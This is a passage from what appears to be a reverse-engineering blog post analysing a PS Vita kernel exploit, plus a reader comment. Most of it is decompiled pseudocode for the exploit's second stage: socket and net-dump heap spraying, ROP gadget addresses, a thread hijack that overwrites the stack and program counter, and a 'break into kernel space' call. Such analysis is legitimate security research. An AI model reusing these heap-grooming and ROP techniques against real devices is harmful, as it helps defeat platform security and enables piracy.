    0x00(x_stack + 0x00008534) = sceNetSocket(x_stack + 0x00010510, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008538) = sceNetSocket(x_stack + 0x00010518, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x0000853C) = sceNetSocket(x_stack + 0x00010520, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008540) = sceNetSocket(x_stack + 0x00010528, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008544) = sceNetSocket(x_stack + 0x00010530, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008548) = sceNetSocket(x_stack + 0x00010538, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x0000854C) = sceNetSocket(x_stack + 0x00010540, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008550) = sceNetSocket(x_stack + 0x00010548, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008554) = sceNetSocket(x_stack + 0x00010550, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008558) = sceNetSocket(x_stack + 0x00010558, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x0000855C) = sceNetSocket(x_stack + 0x00010560, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008560) = sceNetSocket(x_stack + 0x00010568, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008564) = sceNetSocket(x_stack + 0x00010570, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008568) = sceNetSocket(x_stack + 0x00010578, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x0000856C) = sceNetSocket(x_stack + 0x00010580, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008570) = sceNetSocket(x_stack + 0x00010588, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008574) = sceNetSocket(x_stack + 0x00010590, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008578) = sceNetSocket(x_stack + 0x00010598, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x0000857C) = sceNetSocket(x_stack + 0x000105A0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008580) = sceNetSocket(x_stack + 0x000105A8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008584) = sceNetSocket(x_stack + 0x000105B0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008588) = sceNetSocket(x_stack + 0x000105B8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x0000858C) = sceNetSocket(x_stack + 0x000105C0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008590) = sceNetSocket(x_stack + 0x000105C8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008594) = sceNetSocket(x_stack + 0x000105D0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x00008598) = sceNetSocket(x_stack + 0x000105D8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x0000859C) = sceNetSocket(x_stack + 0x000105E0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000085A0) = sceNetSocket(x_stack + 0x000105E8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000085A4) = sceNetSocket(x_stack + 0x000105F0, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000085A8) = sceNetSocket(x_stack + 0x000105F8, 0x00000002, 0x00000001, 0x00000000);
    0x00(x_stack + 0x000085AC) = sceNetSocket(x_stack + 0x00010600, 0x00000002, 0x00000001, 0x00000000);

    // sceNetSocket("sss", AF_INET, SOCK_STREAM, 0);
    0x00(x_stack + 0x000085B8) = sceNetSocket(x_stack + 0x00010608, 0x00000002, 0x00000001, 0x00000000);

    // sceNetSocket("tst", AF_INET, 0x7, 0);
    0x00(x_stack + 0x000085C4) = sceNetSocket(x_stack + 0x00010614, 0x00000002, 0x00000007, 0x00000000);

    // Setup "mhm" ROP
    0x00(x_stack + 0x00008708) = 0x008DD9B5
    0x00(x_stack + 0x0000870C) = 0x000085C4
    0x00(x_stack + 0x00008710) = 0x10007300
    0x00(x_stack + 0x00008714) = 0x00000000
    0x00(x_stack + 0x00008718) = 0x00000000
    0x00(x_stack + 0x0000871C) = 0x00009F90
    0x00(x_stack + 0x00008720) = 0x00000000
    0x00(x_stack + 0x00008724) = 0x000FCDBB
    0x00(x_stack + 0x00008728) = 0x00008810
    0x00(x_stack + 0x0000872C) = 0x000059A9
    0x00(x_stack + 0x00008730) = 0x00000000
    0x00(x_stack + 0x00008734) = 0x00000519

    /*
       "mhm" ROP

        // Issue an IOCtl to "tst" FD
        int ioctl_res = sceNetSyscallIoctl(x_stack + 0x000085C4, 0x10007300, 0x00000000);

        // Store IOCtl result
        0x00(x_stack + 0x00008810) = ioctl_res;

        // Deadlock
        sceWebkit_519();
    */

    // Copy "mhm" ROP chain into "mhm" thread's stack
    memcpy(0x00(x_stack + 0x000086FC), x_stack + 0x00008708, 0x00000100);

    // Set stack pointer
    0x00(x_stack + 0x00008830) = x_stack + 0x000086FC;

    // Set PC
    0x00(x_stack + 0x00008834) = 0x000C048B;    // POP {PC}

    // sceNetSocket("tmp", AF_INET, SOCK_STREAM, 0);
    0x00(x_stack + 0x000085D0) = sceNetSocket(x_stack + 0x00010620, 0x00000002, 0x00000001, 0x00000000);

    // Create several net dumps
    // sceNetDumpCreate("ddd", 0x00000F00, 0x00000000);
    0x00(x_stack + 0x000085F4) = sceNetDumpCreate(x_stack + 0x0001062C, 0x00000F00, 0x00000000);
    0x00(x_stack + 0x000085F8) = sceNetDumpCreate(x_stack + 0x00010638, 0x00000F00, 0x00000000);
    0x00(x_stack + 0x000085FC) = sceNetDumpCreate(x_stack + 0x00010644, 0x00000F00, 0x00000000);
    0x00(x_stack + 0x00008600) = sceNetDumpCreate(x_stack + 0x00010650, 0x00000F00, 0x00000000);
    0x00(x_stack + 0x00008604) = sceNetDumpCreate(x_stack + 0x0001065C, 0x00000F00, 0x00000000);
    0x00(x_stack + 0x00008608) = sceNetDumpCreate(x_stack + 0x00010668, 0x00000F00, 0x00000000);
    0x00(x_stack + 0x0000860C) = sceNetDumpCreate(x_stack + 0x00010674, 0x00000F00, 0x00000000);
    0x00(x_stack + 0x00008610) = sceNetDumpCreate(x_stack + 0x00010680, 0x00000F00, 0x00000000);
    0x00(x_stack + 0x00008614) = sceNetDumpCreate(x_stack + 0x0001068C, 0x00000F00, 0x00000000);
    0x00(x_stack + 0x000085E8) = sceNetDumpCreate(x_stack + 0x00010698, 0x00000F00, 0x00000000);
    0x00(x_stack + 0x000085DC) = sceNetDumpCreate(x_stack + 0x000106A4, 0x00001000, 0x00000000);

    // Destroy some dumps
    sceNetDumpDestroy(x_stack + 0x000085F4);
    sceNetDumpDestroy(x_stack + 0x000085FC);
    sceNetDumpDestroy(x_stack + 0x00008604);
    sceNetDumpDestroy(x_stack + 0x0000860C);
    sceNetDumpDestroy(x_stack + 0x00008614);
    sceNetDumpDestroy(x_stack + 0x000085E8);

    // Create more net dumps
    sceNetDumpCreate(x_stack + 0x000106B0, 0x000D0000, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000106BC, 0x000CFF00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000106C8, 0x000CFE00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000106D4, 0x000CFD00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000106E0, 0x000CFC00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000106EC, 0x000CFB00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000106F8, 0x000CFA00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010704, 0x000CF900, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010710, 0x000CF800, 0x00000000);
    sceNetDumpCreate(x_stack + 0x0001071C, 0x000CF700, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010728, 0x000CF600, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010734, 0x000CF500, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010740, 0x000CF400, 0x00000000);
    sceNetDumpCreate(x_stack + 0x0001074C, 0x000CF300, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010758, 0x000CF200, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010764, 0x000CF100, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010770, 0x000CF000, 0x00000000);
    sceNetDumpCreate(x_stack + 0x0001077C, 0x000CEF00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010788, 0x000CEE00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010794, 0x000CED00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000107A0, 0x000CEC00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000107AC, 0x000CEB00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000107B8, 0x000CEA00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000107C4, 0x000CE900, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000107D0, 0x000CE800, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000107DC, 0x000CE700, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000107E8, 0x000CE600, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000107F4, 0x000CE500, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010800, 0x000CE400, 0x00000000);
    sceNetDumpCreate(x_stack + 0x0001080C, 0x000CE300, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010818, 0x000CE200, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010824, 0x000CE100, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010830, 0x000CE000, 0x00000000);
    sceNetDumpCreate(x_stack + 0x0001083C, 0x000CDF00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010848, 0x000CDE00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010854, 0x000CDD00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010860, 0x000CDC00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x0001086C, 0x000CDB00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010878, 0x000CDA00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010884, 0x000CD900, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010890, 0x000CD800, 0x00000000);
    sceNetDumpCreate(x_stack + 0x0001089C, 0x000CD700, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000108A8, 0x000CD600, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000108B4, 0x000CD500, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000108C0, 0x000CD400, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000108CC, 0x000CD300, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000108D8, 0x000CD200, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000108E4, 0x000CD100, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000108F0, 0x000CD000, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000108FC, 0x000CCF00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010908, 0x000CCE00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010914, 0x000CCD00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010920, 0x000CCC00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x0001092C, 0x000CCB00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010938, 0x000CCA00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010944, 0x000CC900, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010950, 0x000CC800, 0x00000000);
    sceNetDumpCreate(x_stack + 0x0001095C, 0x000CC700, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010968, 0x000CC600, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010974, 0x000CC500, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010980, 0x000CC400, 0x00000000);
    sceNetDumpCreate(x_stack + 0x0001098C, 0x000CC300, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010998, 0x000CC200, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000109A4, 0x000CC100, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000109B0, 0x000CC000, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000109BC, 0x000CBF00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000109C8, 0x000CBE00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000109D4, 0x000CBD00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000109E0, 0x000CBC00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000109EC, 0x000CBB00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x000109F8, 0x000CBA00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010A04, 0x000CB900, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010A10, 0x000CB800, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010A1C, 0x000CB700, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010A28, 0x000CB600, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010A34, 0x000CB500, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010A40, 0x000CB400, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010A4C, 0x000CB300, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010A58, 0x000CB200, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010A64, 0x000CB100, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010A70, 0x000CB000, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010A7C, 0x000CAF00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010A88, 0x000CAE00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010A94, 0x000CAD00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010AA0, 0x000CAC00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010AAC, 0x000CAB00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010AB8, 0x000CAA00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010AC4, 0x000CA900, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010AD0, 0x000CA800, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010ADC, 0x000CA700, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010AE8, 0x000CA600, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010AF4, 0x000CA500, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010B00, 0x000CA400, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010B0C, 0x000CA300, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010B18, 0x000CA200, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010B24, 0x000CA100, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010B30, 0x000CA000, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010B3C, 0x000C9F00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010B48, 0x000C9E00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010B54, 0x000C9D00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010B60, 0x000C9C00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010B6C, 0x000C9B00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010B78, 0x000C9A00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010B84, 0x000C9900, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010B90, 0x000C9800, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010B9C, 0x000C9700, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010BA8, 0x000C9600, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010BB4, 0x000C9500, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010BC0, 0x000C9400, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010BCC, 0x000C9300, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010BD8, 0x000C9200, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010BE4, 0x000C9100, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010BF0, 0x000C9000, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010BFC, 0x000C8F00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010C08, 0x000C8E00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010C14, 0x000C8D00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010C20, 0x000C8C00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010C2C, 0x000C8B00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010C38, 0x000C8A00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010C44, 0x000C8900, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010C50, 0x000C8800, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010C5C, 0x000C8700, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010C68, 0x000C8600, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010C74, 0x000C8500, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010C80, 0x000C8400, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010C8C, 0x000C8300, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010C98, 0x000C8200, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010CA4, 0x000C8100, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010CB0, 0x000C8000, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010CBC, 0x000C7F00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010CC8, 0x000C7E00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010CD4, 0x000C7D00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010CE0, 0x000C7C00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010CEC, 0x000C7B00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010CF8, 0x000C7A00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010D04, 0x000C7900, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010D10, 0x000C7800, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010D1C, 0x000C7700, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010D28, 0x000C7600, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010D34, 0x000C7500, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010D40, 0x000C7400, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010D4C, 0x000C7300, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010D58, 0x000C7200, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010D64, 0x000C7100, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010D70, 0x000C7000, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010D7C, 0x000C6F00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010D88, 0x000C6E00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010D94, 0x000C6D00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010DA0, 0x000C6C00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010DAC, 0x000C6B00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010DB8, 0x000C6A00, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010DC4, 0x000C6900, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010DD0, 0x000C6800, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010DDC, 0x000C6700, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010DE8, 0x000C6600, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010DF4, 0x000C6500, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010E00, 0x000C6400, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010E0C, 0x000C6300, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010E18, 0x000C6200, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010E24, 0x000C6100, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010E30, 0x000C6000, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010E3C, 0x00001000, 0x00000000);
    sceNetDumpCreate(x_stack + 0x00010E48, 0x00001000, 0x00000000);

    // Start "mhm" thread
    // Thread arguments are loaded into R1 and the gadget
    // at the thread's entrypoint then loads register values
    // from it, overwritting SP and PC and triggering the
    // ROP chain
    sceKernelStartThread(thread_id, 0x0000001C, x_stack + 0x0000881C);

    // Delay thread
    sceKernelDelayThread(1500000);

    // Close no longer needed sockets
    sceNetSyscallClose(x_stack + 0x00008470);
    sceNetSyscallClose(x_stack + 0x00008478);
    sceNetSyscallClose(x_stack + 0x00008480);
    sceNetSyscallClose(x_stack + 0x00008488);
    sceNetSyscallClose(x_stack + 0x00008490);
    sceNetSyscallClose(x_stack + 0x00008498);
    sceNetSyscallClose(x_stack + 0x000084A0);
    sceNetSyscallClose(x_stack + 0x000084A8);
    sceNetSyscallClose(x_stack + 0x000084B0);
    sceNetSyscallClose(x_stack + 0x000084B8);
    sceNetSyscallClose(x_stack + 0x000084C0);
    sceNetSyscallClose(x_stack + 0x000084C8);
    sceNetSyscallClose(x_stack + 0x000084D0);
    sceNetSyscallClose(x_stack + 0x000084D8);
    sceNetSyscallClose(x_stack + 0x000084E0);
    sceNetSyscallClose(x_stack + 0x000084E8);
    sceNetSyscallClose(x_stack + 0x000084F0);
    sceNetSyscallClose(x_stack + 0x000084F8);
    sceNetSyscallClose(x_stack + 0x00008500);
    sceNetSyscallClose(x_stack + 0x00008508);
    sceNetSyscallClose(x_stack + 0x00008510);
    sceNetSyscallClose(x_stack + 0x00008518);
    sceNetSyscallClose(x_stack + 0x00008520);
    sceNetSyscallClose(x_stack + 0x00008528);
    sceNetSyscallClose(x_stack + 0x00008530);
    sceNetSyscallClose(x_stack + 0x00008538);
    sceNetSyscallClose(x_stack + 0x00008540);
    sceNetSyscallClose(x_stack + 0x00008548);
    sceNetSyscallClose(x_stack + 0x00008550);
    sceNetSyscallClose(x_stack + 0x00008558);
    sceNetSyscallClose(x_stack + 0x00008560);
    sceNetSyscallClose(x_stack + 0x00008568);
    sceNetSyscallClose(x_stack + 0x00008570);
    sceNetSyscallClose(x_stack + 0x00008578);
    sceNetSyscallClose(x_stack + 0x00008580);
    sceNetSyscallClose(x_stack + 0x00008588);
    sceNetSyscallClose(x_stack + 0x00008590);
    sceNetSyscallClose(x_stack + 0x00008598);
    sceNetSyscallClose(x_stack + 0x000085A0);
    sceNetSyscallClose(x_stack + 0x000085A8);
    sceNetSyscallClose(x_stack + 0x000085C4);

    // Break into kernel space
    sceNetSyscallControl(0x00000000, 0x30000000, x_stack + 0x00008840, 0x000000FC);

    // Destroy another dump
    sceNetDumpDestroy(x_stack + 0x000085DC); 

    // Delay for a while
    sceKernelDelayThread(1000000);

    // Calculate a SceWebkit pointer using the ioctl
    // from "mhm" thread (kernel space?)
    r0 = 0x00(x_stack + 0x00008810) + SceWebkit_base + 0x00000575;

    // Unknown
    sceWebkit_123();
    sceWebkit_CF481();

    // Destroy specific dumps (constant IDs)
    sceNetDumpDestroy(0x00001770);
    sceNetDumpDestroy(0x00001771);
    sceNetDumpDestroy(0x00001772);
    sceNetDumpDestroy(0x00001773);
    sceNetDumpDestroy(0x00001774);
    sceNetDumpDestroy(0x00001775);
    sceNetDumpDestroy(0x00001776);
    sceNetDumpDestroy(0x00001777);
    sceNetDumpDestroy(0x00001778);
    sceNetDumpDestroy(0x00001779);
    sceNetDumpDestroy(0x0000177A);
    sceNetDumpDestroy(0x0000177B);
    sceNetDumpDestroy(0x0000177C);
    sceNetDumpDestroy(0x0000177D);
    sceNetDumpDestroy(0x0000177E);
    sceNetDumpDestroy(0x0000177F);
    sceNetDumpDestroy(0x00001780);
    sceNetDumpDestroy(0x00001781);
    sceNetDumpDestroy(0x00001782);
    sceNetDumpDestroy(0x00001783);
    sceNetDumpDestroy(0x00001784);
    sceNetDumpDestroy(0x00001785);
    sceNetDumpDestroy(0x00001786);
    sceNetDumpDestroy(0x00001787);
    sceNetDumpDestroy(0x00001788);
    sceNetDumpDestroy(0x00001789);
    sceNetDumpDestroy(0x0000178A);
    sceNetDumpDestroy(0x0000178B);
    sceNetDumpDestroy(0x0000178C);
    sceNetDumpDestroy(0x0000178D);
    sceNetDumpDestroy(0x0000178E);
    sceNetDumpDestroy(0x0000178F);
    sceNetDumpDestroy(0x00001790);

    // Deadlock
    sceWebkit_519(0x00000000);
- Stage 4 (kernel ROP):

The second ROP payload sets the stage for a kernel attack. Once it has finished, another ROP chain should start on the kernel side. This chain relies on the kernel pointers that were leaked during the second payload's execution and is built beforehand. The data portion of the chain is additionally obfuscated/encrypted with kernel-only functions.

To reverse-engineer the exploit any further, one must dump the target kernel modules, rebuild the kernel ROP chain and deobfuscate/decrypt the data region.

To be continued...
~ H.
 

Comments

PS Vita game backups playable soon! I am into Uncharted on this PS Vita. Great for the many emulators on PS Vita, of course. It looks nicer than the PSP console. :D
 